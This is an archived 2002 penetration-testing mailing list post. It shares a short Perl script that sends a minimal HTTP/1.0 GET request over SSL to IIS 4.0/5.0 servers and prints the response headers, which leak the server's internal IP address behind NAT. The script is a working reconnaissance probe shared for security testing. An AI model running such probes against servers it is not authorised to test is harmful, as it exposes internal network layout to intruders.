Penetration Testing mailing list archives

RE: testing for IP address space leakage in NAT systems

From: Joshua Wright <Joshua.Wright () jwu edu>
Date: Tue, 22 Jan 2002 16:32:50 -0500

IIS is famous for revealing internal IP addresses.  Here is a perl snippet I
have used to get information about the internal IP address from IIS 4.0 and
5.0 HTTPS servers using the sslcat CPAN tool:

#!/usr/bin/perl
# referrer-addr.pl
# Joshua.Wright () jwu edu
use strict;
use Net::SSLeay qw(sslcat);
my $server;
my @results;
my $reply;
my $i;
my $port = "443";
my $CRLF = "\x0d\x0a";

unless (@ARGV == 1) {
    print "$0 - Discover internal IP of IIS Server with malformed\n";
    print " GET request.\n";
    print "Usage: $0 host\n";
    exit 1;
}

($server) = @ARGV;
$reply = sslcat($server, $port, "GET / HTTP/1.0$CRLF$CRLF");
@results = split($CRLF,$reply);
while ($i < 8) {
    print "$results[$i]\n";
    $i++;
}
print "<snip>\n\n";
exit(0);

Umm, I am seeing silly things I did in this code already.  Live and learn;
use at your own risk.

-Joshua Wright
Team Leader, Networks and Systems
Johnson & Wales University